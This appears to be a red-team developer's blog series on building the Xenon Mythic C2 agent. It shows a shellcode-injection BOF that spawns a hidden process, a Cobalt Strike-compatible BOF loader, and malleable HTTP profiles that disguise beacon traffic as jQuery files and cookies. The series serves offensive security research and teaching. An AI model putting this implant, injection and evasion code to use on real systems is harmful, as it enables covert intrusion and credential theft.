c0rnbread blog

Part 6: Recreating Cobalt Strike’s Process Injection Kit

c0rnbread — Tue, 09 Sep 2025 02:02:24 GMT

Background

Process injection or code injection is a technique in which you copy and execute arbitrary code to a target process. It is often used in Offensive Security to execute tasks under the context of another legitimate process on the system.

Before this blog my Mythic C2 agent, Xenon, only implemented process injection for executing .NET assemblies in-memory, but I planned on using it for post-ex commands going forward.

Since malware has used process injection for decades, this is going to be one of the most suspicious things Xenon will need to do. It’s an easy detection/signature point, especially for an open-source tool like this one. That is why I wanted to support user-defined process injection methods.

Obviously, users could always edit the agent’s source code directly and change the default process injection method, but I wanted to tackle the challenge of supporting previously written kits.

Something like Cobalt Strike’s Process Injection Kit.

Why Inject?

Let’s just get this part out of the way.

So why do we want to do process injection in the first place? The original thinking behind doing remote process injection was to “protect” the main beaconing process from crashing and disperse memory artifacts away from its own process.

Without process injection

You have a C2 beacon running in a.exe.
The operator runs a mimikatz task.
The agent tries to execute it, but it crashes or gets detected.
Result: a.exe dies and you lose your entire foothold.

With process injection

The beacon is still running in a.exe.
The operator runs a mimikatz task.
Instead of executing inside itself, a.exe injects mimikatz’s position-independent code into legit.exe.
If legit.exe crashes, the task fails but a.exe is still alive and beaconing.

Cobalt Strike - Process Injection Kit

The Process Injection Kit in CS is a feature that implements two “hook” functions for post-exploitation commands that use post-ex DLLs.

Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.

The two hooks in CS are PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT.

PROCESS_INJECT_SPAWN - spawns a temporary process and then injects into it.

PROCESS_INJECT_EXPLICIT - injects into an already running process.

If using the process injection kit, these hook functions override the default process injection technique. It basically allows the operator to define custom injection functionality to avoid detections/signatures.

Spawn Injection Commands

In Cobalt Strike, specific commands use the fork & run technique. The main purpose for this is to ‘protect’ the beacon from crashing or detection. Although in today’s world I think fork & run is probably going to hurt you on detections.

Beacon Command	Aggressor Script function	UI Interface
chromedump
dcsync	&bdcsync
elevate	&belevate	[beacon] -> Access -> Elevate
		[beacon] -> Access -> Golden Ticket
hashdump	&bhashdump	[beacon] -> Access -> Dump Hashes
keylogger	&bkeylogger
logonpasswords	&blogonpasswords	[beacon] -> Access -> Run Mimikatz
		[beacon] -> Access -> Make Token (use a hash)
mimikatz	&bmimikatz
	&bmimikatz_small
net	&bnet	[beacon] -> Explore -> Net View
portscan	&bportscan	[beacon] -> Explore -> Port Scan
powerpick	&bpowerpick
printscreen	&bprintscreen
pth	&bpassthehash
runasadmin	&brunasadmin
		[target] -> Scan
screenshot	&bscreenshot	[beacon] -> Explore -> Screenshot
screenwatch	&bscreenwatch
ssh	&bssh	[target] -> Jump -> ssh
ssh-key	&bssh_key	[target] -> Jump -> ssh-key
		[target] -> Jump -> [exploit] (use a hash)

Commands that support the PROCESS_INJECT_SPAWN hook in 4.5

Explicit Injection Commands

Explicit injection doesn’t spawn a temporary process, but injects into an already existing process on the target host.

Beacon Command	Aggressor Script function	UI Interface
browserpivot	&bbrowserpivot	[beacon] -> Explore -> Browser Pivot
chromedump
dcsync	&bdcsync
dllinject	&bdllinject
hashdump	&bhashdump
inject	&binject	[Process Browser] -> Inject
keylogger	&bkeylogger	[Process Browser] -> Log Keystrokes
logonpasswords	&blogonpasswords
mimikatz	&bmimikatz
	&bmimikatz_small
net	&bnet
portscan	&bportscan
printscreen
psinject	&bpsinject
pth	&bpassthehash
screenshot		[Process Browser] -> Screenshot (Yes)
screenwatch		[Process Browser] -> Screenshot (No)
shinject	&bshinject
ssh	&bssh
ssh-key	&bssh_key

Commands that support the PROCESS_INJECT_EXPLICIT hook in 4.5

Mythic Implementation

Disclaimer

It should be stated that in modern C2 implants there has been a big shift away from the fork & run technique to in-process execution. Most modern implants rely heavily on in-process execution of BOF files. This is because fork & run is “louder” from an events perspective, because it involves remote process injection which has become increasingly more detectable.

So why did I bother reimplementing Process Injection Kit at all?

Really for these purposes:

Learn about it’s implementation in Cobalt Strike.
Provide the option to use your own process injection techniques without modifying Xenon’s code base.

BOF files do have some key advantages over fork & run:

A plethora of open-source examples
Rapid development
Small memory footprint
In-process execution

Default Injection

Xenon’s default injection method is a basic APC injection, a very well signatured behavior that will most likely be flagged by AV engines (but maybe not ).

Register Kit

To start, I introduced a new Mythic command, register_process_inject_kit, to the Xenon agent. It allows you to upload a custom process injection kit into Xenon.

Process Injection Kit's are implemented as Beacon Object Files (BOFs) and uploaded through the modal.

Currently only PROCESS_INJECT_SPAWN behavior is supported which spawns a new sacrificial process to perform process injection.

For now, it takes two arguments --enabled and --inject_spawn.

--enabled - Enables ALL Xenon payloads to use the custom injection method.
--inject_spawn - Saves a BOF file as the new injection kit.

Once your kit is registered all supported commands will use the BOF to perform injection.

Commands

Currently these are the only commands that will be overridden by the process injection kit.

execute_assembly
mimikatz

The Pipe Problem

At this point in the implementation I found myself stuck in a pickle.

User uploads their BOF (kit) with register_process_inject_kit
User runs a fork & run command
Server sends command to agent
Agent executes kit to inject shellcode into remote process

How do we get the output from a remote process?

Previously this was easy because we controlled the code that spawned the remote process and could use anonymous pipes to get the process’s output. But now the user controls the spawning functionality in their BOF.

I thought, well, their BOF can use the internal BeaconAPIs I’ve defined like BeaconSpawnTemporaryProcess , so should I just modify that to use an anonymous pipe?

But then the calling code (their code) would need to pass a handle to the function then check it for output.

I could modify the function to use a named pipe, but then what if they don’t use the BeaconAPIs to spawn the sacrificial process? Then they wouldn’t get any output still.

Unfortunately this would make my implementation incompatible with people’s already existing Process Injection Kits.

More shellcoding…

To avoid this I did something wacky, that turned out to be similar to what Cobalt Strike did.

I created a PIC stub which gets prepended to all post-ex PIC that does the following:

Walks the Process Environment Block (PEB) to find the addresses for CreateFileA and SetStdHandle
Calls CreateFileA to create a named pipe with a known string
Calls SetStdHandle to set the stdout and stderr in the current process to the named pipe
Jumps to the next block of shellcode

Now when the post-ex PIC executes in that process it will write all output to our named pipe. In our main beacon process we can just read data from that named pipe until there’s none left.

xenon → injects stub+shellcode → stub sets output to \\\\.\\pipe\\something→ shellcode executes

I discovered this was similar to how Cobalt Strike implements output retrieval from remote processes. The difference is they do not use donut-shellcode, but instead a custom PIC DLL reflective loader (DRL) that sets the output in the current process to a named pipe.

beacon → injects DRL+DLL→ DRL sets output to \\\\.\\pipe\\something → DLL executes

Development

If you want to write your own process injection kit refer to Cobalt Strike’s documentation.

Here is a simple example:

#include 
#include "beacon.h"

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   STARTUPINFOA        si;
   PROCESS_INFORMATION pi;
   datap               parser;
   short               ignoreToken;
   char *              dllPtr;
   int                 dllLen;

   /* Warn about crossing to another architecture. */
   if (!is_x64() && x86 == FALSE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x86 -> x64");
   }
   if (is_x64() && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x64 -> x86");
   }

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   ignoreToken = BeaconDataShort(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* zero out these data structures */
   __stosb((void *)&si, 0, sizeof(STARTUPINFO));
   __stosb((void *)&pi, 0, sizeof(PROCESS_INFORMATION));

   /* setup the other values in our startup info structure */
   si.dwFlags = STARTF_USESHOWWINDOW;
   si.wShowWindow = SW_HIDE;
   si.cb = sizeof(STARTUPINFO);

   /* Ready to go: spawn, inject and cleanup */
   if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
      return;
   }
   BeaconInjectTemporaryProcess(&pi, dllPtr, dllLen, 0, NULL, 0);
   BeaconCleanupProcess(&pi);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}

IMPORTANT - The BOF injection kit must parse two arguments passed from Mythic, regardless if it uses them:

ignoreToken - Boolean value that Xenon doesn’t use yet, but still needs to be there.

dllPtr - A pointer to the beginning of the shellcode being executed.

The example code above is essentially the same behavior as Xenon's default process injection method. It can be easily modified to change the injection behavior to something custom, and that's where the advantage is.

Using register_process_inject_kit the injection behavior can be changed at any point in the running payload without compiling a new payload.

You can compile the example BOF with the following:

x86_64-w64-mingw32-gcc -o inject_spawn.x64.o -c inject_spawn.c

Then register the new kit with the register_process_inject_kit command to the Mythic server.

register_process_inject_kit command

Now all supported commands will use your new process injection behavior!

Injecting .NET assembly shellcode

Examples

If your like me, you might just want to use some publicly available kits out there.

Here are some real-world examples of modified injection kits:

InjectKit - Indirect syscalls via the Tartarus Gate method.
secinject - Section Mapping Process Injection (secinject): Cobalt Strike BOF
CB_process_Inject - A simple process injection kit for cobalt strike based on syscalls

Wrapping Up

I mostly went through this process, because I thought the idea of swapping out process injection methods on the fly was cool.

Practically speaking I would probably opt for in-process BOF execution on a real engagement.

Part 5: Cough Cough 🤧

c0rnbread — Tue, 11 Mar 2025 19:56:01 GMT

Adding a COFF loader, Cobalt Strike BOFs, crashing and crashing

Intro

BOFs might be the most popular format for post-exploitation tooling in the cyber space. There are a bunch of reasons for that which we will discuss below.

So I really wanted Xenon to be compatible with the plethora of pre-existing BOFs out there. To accomplish this, the COFF loader must be compatible with Cobalt Strike’s BOF and argument format which is handled in a particular way.

Common Object File Format (COFF)

First I wanted to learn more about what the hell a COFF actually is.

It stands for Common Object File Format. More generally they could be referred to as object files.

Object files are compiled executable code that are linked during compilation to create the final standalone executable file (exe, dll, etc). They are a step in the process of compiling an executable. Their role in that process goes as follows:

Object files are compiled

In this stage of compilation, object files are compiled into executable code but cannot stand on their own. Symbols are created which represent the variables in the code before. Those symbols don’t actually point anywhere yet.

Linker resolves symbols

Next the linker actually reviews each symbol in the object file, maps them to a memory address, and builds the executable. Because of this ‘linking’, code from one object file can call a function defined in a different object file.

Take this function for example:

#include 

void popme() 
{
        MessageBoxA(NULL, "Hello", "test", MB_OK);
}

We can compile it into a COFF object file with the -c flag.

$ x86_64-w64-mingw32-gcc hello.c -c -o hello.o

Running file on it we can see it is indeed a COFF object file, and it even tells us how many symbols there are.

$ file hello.o
hello.o: Intel amd64 COFF object file, no line number info, not stripped, 7 sections, symbol offset=0x1f0, 19 symbols

Opening the file up in Binary Ninja, we can view the disassembly.

We can see relative addresses (rel) which are actually symbols for those variables, but notice the actual bytes for the addresses are blank (0000).

For example:

__imp_MessageBoxA is a symbol that represents the MessageBoxA function

The addresses are blank because it is the linkers job to resolve those symbols to a memory space address and put the whole executable file together.

COFF Loader

So COFF files are basically compiled ‘templates’ for some piece of code. In order to actually execute those ‘templates’ we would need to resolve some things first.

We must do the following in order to execute a COFF file in-memory:

Parse the COFF file according to COFF specification
Retrieve COFF sections and map them in-memory
Resolve symbols and modify the sections to set reference addresses
Resolve external symbols
Retrieve the section containing executable code
Run the executable code

Now I could try and implement this all from scratch and learn a ton and be so elite. Or … I could just go off of the many examples that have already been published on this topic.

I decided on the latter.

I said ‘go off of’ but its more like ‘copy & paste’.

Anyways, here is the example I took most of the code from. It supports compatibility with BOFs created for Cobalt Strike. The way it does that is by defining and resolving the ‘Beacon API’ functions that Cobalt Strike uses.

Resolving Functions

For Beacon API functions it checks for any strings with ‘Beacon*’, then it assigns the appropriate function pointer to that symbol based on the current process.

For external functions it checks for the “$” format and then calls LoadLibraryA and GetProcAddress to resolve it’s function pointer. Not necessarily the most OPSEC safe way of resolving a pointer to the function, but it works.

BOF Arguments

The other major aspect of making a COFF loader that is Cobalt Strike compatible is handling arguments. CS BOFs handle arguments in a specific way. The arguments are binary serialized, sort of like how we are packing & parsing data to and from the Mythic server.

In the repository I took the code from, they use a struct for BOF arguments that looks like this:

typedef struct _Arg {
    char* value;
    size_t size;
    BOOL includeSize;
} Arg;

Then they pack the arguments into a binary serialized format using a function like this.

void PackData(Arg* args, size_t numberOfArgs, char** output, size_t* size) {
	uint32_t fullSize = 0;
	for (size_t i = 0; i < numberOfArgs; i++) {
		Arg arg = args[i];
		fullSize += sizeof(uint32_t) + arg.size;
	}
	*output = (char*)malloc(sizeof(uint32_t) + fullSize);
	fullSize = 4;
	for (size_t i = 0; i < numberOfArgs; i++) {
		Arg arg = args[i];
		if (arg.includeSize == TRUE) {
			memcpy(*output + fullSize, &arg.size, sizeof(uint32_t));
			fullSize += sizeof(uint32_t);
		}
		memcpy(*output + fullSize, arg.value, arg.size);
		fullSize += arg.size;
	}
	memcpy(*output, &fullSize, sizeof(uint32_t));
	*size = fullSize;
}

Strings → 4bytes for length + data bytes
Integers → 4bytes

The output is a char* buffer with all the serialized arguments.

The easier way to do this with Mythic is to have the operator predefine the argument types for the BOF and then serialize the data on the server side! Then we can just parse the serialized argument buffer from the task and pass it to the RunCOFF() function!

We can define a command parameter in Mythic which lets the operator dynamically set inputs. Then parse the typed array in a function and pass the argument on as a list.

The code below is based off of the way the Apollo agent handles arguments.

Payload_Type/xenon/xenon/mythic/agent_functions/inline_execute.py

class InlineExecuteArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
  .......................
            CommandParameter(
                name="bof_arguments",
                cli_name="Arguments",
                display_name="Arguments",
                type=ParameterType.TypedArray,
                default_value=[],
                choices=["int16", "int32", "string", "wchar", "base64"],
                description="""Arguments to pass to the BOF via the following way:
                -s:123 or int16:123
                -i:123 or int32:123
                -z:hello or string:hello
                -Z:hello or wchar:hello
                -b:abc== or base64:abc==""",
                typedarray_parse_function=self.get_arguments,
                parameter_group_info=[
                    ParameterGroupInfo(
                        required=False,
                        group_name="Default",
                        ui_position=4
                    ),
                    ParameterGroupInfo(
                        required=False,
                        group_name="New",
                        ui_position=4
                    ),
                ]),
        ]
	    async def get_arguments(self, arguments: PTRPCTypedArrayParseFunctionMessage) -> PTRPCTypedArrayParseFunctionMessageResponse:
        argumentSplitArray = []
        for argValue in arguments.InputArray:
            argSplitResult = argValue.split(" ")
            for spaceSplitArg in argSplitResult:
                argumentSplitArray.append(spaceSplitArg)
        bof_arguments = []
        for argument in argumentSplitArray:
            argType,value = argument.split(":",1)
            value = value.strip("\\'").strip("\\"")
            if argType == "":
                pass
            elif argType == "int16" or argType == "-s" or argType == "s":
                bof_arguments.append(["int16",int(value)])
            elif argType == "int32" or argType == "-i" or argType == "i":
                bof_arguments.append(["int32",int(value)])
            elif argType == "string" or argType == "-z" or argType == "z":
                bof_arguments.append(["string",value])
            elif argType == "wchar" or argType == "-Z" or argType == "Z":
                bof_arguments.append(["wchar",value])
            elif argType == "base64" or argType == "-b" or argType == "b":
                bof_arguments.append(["base64",value])
            else:
                return PTRPCTypedArrayParseFunctionMessageResponse(Success=False,
                                                                   Error=f"Failed to parse argument: {argument}: Unknown value type.")

        argumentResponse = PTRPCTypedArrayParseFunctionMessageResponse(Success=True, TypedArray=bof_arguments)
        return argumentResponse

At this point, we have a list containing the C-types and arguments for the target BOF. These get passed as a Python list to the Translation Container.

In the Translation Container we handle the list and serialize the BOF arguments into a packed byte-string:


from .utils import Packer
[SNIP]    
    elif isinstance(param_value, list):
      logging.info(f"[Arg-list] {param_value}")
      # No arguments
      if param_value == []:
          encoded += b"\\x00\\x00\\x00\\x00"
          return encoded

      # Use packer class to pack serialized arguments
      packer = Packer()
      # Handle TypedList as single length-prefixed argument to Agent (right now ONLY used by inline_execute function)
      for item in param_value:
          item_type, item_value = item
          if item_type == "int16":
              packer.addshort(int(item_value))
          elif item_type == "int32":
              packer.adduint32(int(item_value))
          elif item_type == "string":
              packer.addstr(item_value)
          elif item_type == "wchar":
              packer.addWstr(item_value)
          elif item_type == "base64":
              try:
                  decoded_value = base64.b64decode(item_value)
                  packer.addstr(decoded_value)
              except Exception:
                  raise ValueError(f"Invalid base64 string: {item_value}")

      # Size + Packed Data
      packed_params = packer.getbuffer()
      encoded += len(packed_params).to_bytes(4, "big") + packed_params
[SNIP]

The buffer gets passed as a single length-prefixed Mythic task argument inside of byte string called encoded. The agent reads the arguments for the task (file UUID and BOF argument buffer).

VOID InlineExecute(PCHAR taskUuid, PPARSER arguments)
{
    /* Parse BOF arguments */
    UINT32 nbArg = ParserGetInt32(arguments);
    _dbg("GOT %d arguments for BOF", nbArg);

    DWORD  status;
    SIZE_T uuidLen   = 0;
    SIZE_T argLen    = 0;
    DWORD  filesize  = 0;
    BOF_UPLOAD bof   = { 0 };

    PCHAR  fileUuid  = ParserGetString(arguments, &uuidLen);
    PCHAR  bofArgs   = ParserGetString(arguments, &argLen);
[SNIP]

The file UUID is a 36 character ID that represents the BOF file on the Mythic server. Next we will download the BOF file contents using a custom function LoadBofViaUuid() (view the code for full details).

/* Fetch BOF file from Mythic */
if (status = LoadBofViaUuid(taskUuid, &bof) != 0)
{
    _err("Failed to fetch BOF file from Mythic server.");
    PackageError(taskUuid, status);
    return;
}

Finally, we call our RunCOFF() function passing in a buffer to the BOF file contents, size of BOF, entry point name, buffer to BOF arguments, and size of arguments.

/* Execute the BOF with pre-packed arguments */
filesize = bof.size;
if (!RunCOFF(bof.buffer, &filesize, "go", bofArgs, argLen)) {
		_err("Failed to execute BOF in current thread.");
    LocalFree(bof.buffer);
    PackageError(taskUuid, ERROR_MYTHIC_BOF);
    return;
}

Currently BOFs are executed inline, meaning in the same thread as the agent. Therefore, if the BOF crashes the agent process will crash too!

So BOFs should be extensively tested before being used in a live environment.

Inline-execute

In Mythic I create a command called inline_execute which calls this task in the agent. If you have to execute a BOF using inline_execute then you can upload the BOF and pass in the arguments needed.

Warning, the command does not know what parameters the BOF expects, so you must figure it out and add them.

For example, netshares.x64.o expects a wchar (even if its empty). If you pass no arguments you will crash.

The BOF tried to parse the expected wchar and then crashed since it read unintended memory.

Part 6: Recreating Cobalt Strike’s Process Injection Kit

Part 4: Getting an Upgrade ⚒️

c0rnbread — Tue, 11 Mar 2025 16:58:44 GMT

yes… i named this one after the minecraft achievement.

The Httpx container, malleable C2 profiles, and wininet.

Flexible Request Profiles

To be honest, this is where I spent the bulk of my development for this project.

Up to this point, the http C2 profile served it’s purpose and allowed us to learn the basic Mythic concepts:

Request types (checkin,get_tasking, and post_response)
Dynamically stamping in connection details (callback_interval,callback_host, etc) to the agent during the build process

But, I wanted more fine-grained control over what my HTTP(S) traffic looked like. I have personally been on red/purple team engagements where the client network had SSL introspection configured on hosts and suspicious HTTPS traffic got me burned.

Malleable C2

When Cobalt Strike first introduced it’s malleable C2 profiles it was a groundbreaking feature that allowed for a highly customizable network footprint. Nowadays it’s pretty common for C2 frameworks to allow some degree of customization for network profiles.

I wanted to bring that level of flexibility to this agent and the httpx container is the only public Mythic C2 profile that allows you to do that.

Httpx C2 Profile

This profile is another C2 profile container from @its_a_feature_ that takes agent configurations written in either JSON or TOML and can be used during the agent build process. It is still in beta, but I must say works quite well.

It allows much more customization over the requests such as:

Transformations

base64 / base64url
netbios / netbiosu
append / prepend
xor

Message Location

cookie
query
header
body

As well as adding arbitrary Headers and URL Parameters.

Here is a shortened example from the documentation of one of these agent configurations.

{
    "name": "test",
    "get": {
      "verb": "GET",
      "uri": "/test",
      "client": {
        "headers": {
          "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Encoding": "gzip, deflate",
          "Connection": "Keep-Alive",
          "Keep-Alive": "timeout=10, max=100",
          "Referer": ""
        },
        "message": {
          "location": "cookie",
          "name": "__cfduid"
        },
        "transforms": [
          {
            "action": "base64",
            "value": ""
          }
        ]
      },
      "server": {
        "headers": {
          "Cache-Control": "max-age=0, no-cache",
          "Connection": "keep-alive",
          "Content-Type": "application/javascript; charset=utf-8",
          "Pragma": "no-cache",
          "Server": "Apache"
        },
        "transforms" : [
          {
            "action": "xor",
            "value": "randomKey"
          },
          {
            "action": "base64",
            "value": ""
          },
          {
            "action": "prepend",
            "value": "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"
          },
          {
            "action": "append",
            "value": "\\".(o=t.documentElement,Math.max(t.body[\\"scroll\\"+e],o[\\"scroll\\"+e],t.body[\\"offset\\"+e],o[\\"offset\\"+e],o[\\"client\\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\\".split(\\" \\"),function(e,t){w.fn[t]=function(e,n){return arguments.length\\u003e0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\\"**\\"):this.off(t,e||\\"**\\",n)}}),w.proxy=function(e,t){var n,r,i;if(\\"string\\"==typeof t\\u0026\\u0026(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\\"number\\"===t||\\"string\\"===t)\\u0026\\u0026!isNaN(e-parseFloat(e))},\\"function\\"==typeof define\\u0026\\u0026define.amd\\u0026\\u0026define(\\"jquery\\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w\\u0026\\u0026(e.$=Kt),t\\u0026\\u0026e.jQuery===w\\u0026\\u0026(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"
          }
        ]
      }
    },
    "post": {
      "verb": "POST",
      "uri": "/test",
      "client": {
        "headers": {
          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Encoding": "gzip, deflate",
          "Referer": ""  
        },
        "parameters": null,
        "message": {
          "location": "body",
          "name": null
        },
        "transforms": [
          {
            "action": "xor",
            "value": "someOtherRandomKey"
          },
          {
            "action": "base64",
            "value": ""
          }
        ]
      },
      "server": {
        "headers": {
          "Cache-Control": "max-age=0, no-cache",
          "Connection": "keep-alive",
          "Content-Type": "application/javascript; charset=utf-8",
          "Pragma": "no-cache",
          "Server": "Apache"
        },
        "transforms" : [
          {
            "action": "xor",
            "value": "yetAnotherSomeRandomKey"
          },
          {
            "action": "base64",
            "value": ""
          },
          {
            "action": "prepend",
            "value": "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"
          },
          {
            "action": "append",
            "value": "\\".(o=t.documentElement,Math.max(t.body[\\"scroll\\"+e],o[\\"scroll\\"+e],t.body[\\"offset\\"+e],o[\\"offset\\"+e],o[\\"client\\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\\".split(\\" \\"),function(e,t){w.fn[t]=function(e,n){return arguments.length\\u003e0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\\"**\\"):this.off(t,e||\\"**\\",n)}}),w.proxy=function(e,t){var n,r,i;if(\\"string\\"==typeof t\\u0026\\u0026(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\\"number\\"===t||\\"string\\"===t)\\u0026\\u0026!isNaN(e-parseFloat(e))},\\"function\\"==typeof define\\u0026\\u0026define.amd\\u0026\\u0026define(\\"jquery\\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w\\u0026\\u0026(e.$=Kt),t\\u0026\\u0026e.jQuery===w\\u0026\\u0026(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"
          }
        ]
      }
    }
  }

Payload Transformations

Okay, httpx is exactly what we want. An already created HTTP(S) server that allows for fine-grained control over different features of our requests/responses and will undo/apply those configured in our JSON.

But now we have to build all of this into our agent… and it’s in C. 😭😭

Luckily I had a really good reference project that's goal was to reconstruct the Cobalt Strike Beacon source code. I referenced its transform functions while implementing this.

Essentially, I built upon their struct TRANSFORM which takes the unmodified payload and then applies a series of ‘transforms’ to the struct. The struct is then used when crafting the final web request using wininet.

typedef struct TRANSFORM
{
	const char* headers;
	const char* cookies;
	const char* uriParams;
	const char* uri;
	void* body;
	DWORD bodyLength;
	unsigned int outputLength;
	const char* transformed;
	char* temp;
	PPARSER parser;
} TRANSFORM;

My request transform struct

The transform settings are parsed from the JSON/TOML configuration uploaded during the payload creation process OR created on the Payload page.

Upload malleable profile

In my builder.py file:

Parse the JSON file data raw_c2_config
1. The transformations are converted into (4) four c-style hex strings
The packed hex strings are stamped into my Config.h file as macros

'''
    HTTP(X) request profiles ( in [Type, Size, Data] format)
'''
with open(agent_build_path.name + "/Include/Config.h", "r+") as f:
    content = f.read()

    # Generate byte arrays for the malleable C2 profiles
    get_client, post_client, get_server, post_server = generate_raw_c2_transform_definitions(Config["raw_c2_config"])
    
    content = content.replace("%S_C2_GET_CLIENT%", get_client)
    content = content.replace("%S_C2_POST_CLIENT%", post_client)
    content = content.replace("%S_C2_GET_SERVER%", get_server)
    content = content.replace("%S_C2_POST_SERVER%", post_server)
    
    logging.info("Malleable C2 Profiles: \\n")
    logging.info(f'#define S_C2_GET_CLIENT "{get_client}"')
    logging.info(f'#define S_C2_POST_CLIENT "{post_client}"')
    logging.info(f'#define S_C2_GET_SERVER "{get_server}"')
    logging.info(f'#define S_C2_POST_SERVER "{post_server}"')
    
    # Write the updated content back to the file
    f.seek(0)
    f.write(content)
    f.truncate()

Some transforms like xor, append, and prepend require a parameter, like a key or some other data. The macros data are in the following format:

transform_byte + transform_parameter

Requests

Then before requests are transmitted they are run through the TransformApply function using the specific reqProfile . The data is parsed in a switch case inside of a for loop to apply all the transforms.

// Gets the type of client transform
for (int step = ParserGetInt32(&parser); step; step = ParserGetInt32(&parser))
{
	switch (step)
	{
		case TRANSFORM_BASE64:
		...
		case TRANSFORM_XOR:
			// Gets the parameter from the transform step
			ParserStringCopySafe(&parser, param, &len);
		...
	}
}

In this way, we can apply as many transformations as we want to the message payload (as long as we don’t overflow some buffer maximums).

After the transformations are applied to the structure instance, the transform instance is used to create a GET or POST request with the wininet API functions.

Responses

For responses we basically do the opposite of the above with the TransformReverse function, except we don’t need to worry about the actual buffer data for append and prepend. We can just shift the pointer to not read those bytes.

Wininet Requests

Now that the TRANSFORM struct has been filled out and modified with the current request attributes, we have to configure the request and send it using the appropriate wininet APIs.

For GET requests we will create HttpGet which will:

Apply transformations to the payload message with TransformApply
Construct the final URI using any URI parameters
Initiate a new GET request with HttpOpenRequestA
Update the HINTERNET handle with HttpUpdateSettings
Send the request with HttpSendRequestA

BOOL HttpGet(PPackage package, PBYTE* ppOutData, SIZE_T* pOutLen)
{
#define MAX_URI 0x400		// 1kb
#define MAX_URL 0x400
#define MAX_READ 0x1000		// 4kb
#define MAXGET 1048576		// 1mb
	TRANSFORM transform;
	memset(&transform, 0, sizeof(transform));

	CHAR finalUri[MAX_URI];
	memset(finalUri, 0, sizeof(finalUri));

	TransformInit(&transform, MAXGET);

	TransformApply(&transform, package->buffer, package->length, S_C2_GET_CLIENT);

	// Add any URI parameters (e.g., /test?value=1&other=2)
	if (strlen(transform.uriParams))
		snprintf(finalUri, sizeof(finalUri), "%s%s", transform.uri, transform.uriParams);
	else
		snprintf(finalUri, sizeof(finalUri), "%s", transform.uri);

	HINTERNET hInternet = HttpOpenRequestA(
		gInternetConnect,
		"GET",
		finalUri,
		NULL,
		NULL,
		NULL,
		gHttpOptions,
		&gContext);

	SecureZeroMemory(finalUri, sizeof(finalUri));

	DWORD error = 0;

	// Check if InternetOpenA failed
	if (hInternet == NULL)
	{
		error = GetLastError();
		_err("HttpOpenRequestA failed with error code: %d", error);
		TransformDestroy(&transform);
		return FALSE;
	}

	HttpUpdateSettings(hInternet);
	// Send request
	if (!HttpSendRequestA(hInternet, transform.headers, strlen(transform.headers), transform.body, transform.bodyLength))
	{
		error = GetLastError();
		_err("HttpSendRequestA failed with error code: %d", error);
		TransformDestroy(&transform);
		return FALSE;
	}
	...
}

The function goes on to read the response and perform the reverse transformations.

Traffic Profile

It’s always a good idea to check your work and make sure what we think is happening, is in fact happening.

I’ve created an example havex-profile.json profile that utilizes a bunch of transformations to try and appear as benign HTTP traffic.

We can see the GET requests in Wireshark with the payload in the PHPSESSID cookie location we defined in the JSON file.

